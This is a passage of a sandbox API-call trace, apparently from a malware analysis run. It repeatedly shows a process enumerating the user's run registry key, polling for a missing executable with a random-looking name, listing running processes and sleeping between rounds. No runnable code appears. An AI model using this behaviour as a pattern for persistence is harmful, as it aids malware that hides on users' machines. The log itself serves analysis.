[0264.206] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.206] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.206] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.315] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.331] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.331] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.331] NtClose (Handle=0x14c) returned 0x0 [0264.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.331] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.332] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.332] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.332] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.426] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.446] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.446] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.447] NtClose (Handle=0x14c) returned 0x0 [0264.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.447] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.447] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.447] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.447] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.560] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.564] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.564] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.564] NtClose (Handle=0x14c) returned 0x0 [0264.564] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.564] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.564] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.564] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.565] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.565] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.663] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.677] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.677] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.677] NtClose (Handle=0x14c) returned 0x0 [0264.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.677] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.677] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.677] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.677] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.771] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.782] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.782] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.782] NtClose (Handle=0x14c) returned 0x0 [0264.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.783] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.783] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.783] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.783] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.907] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.923] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.923] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.923] NtClose (Handle=0x14c) returned 0x0 [0264.923] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.923] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.923] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.923] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.923] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.924] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.021] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.033] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.033] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0265.033] NtClose (Handle=0x14c) returned 0x0 [0265.034] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.034] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.034] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.034] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0265.034] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0265.034] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0265.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0265.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0265.130] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0265.141] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0265.142] NtEnumerateValueKey (in: KeyHandle=0x14c, 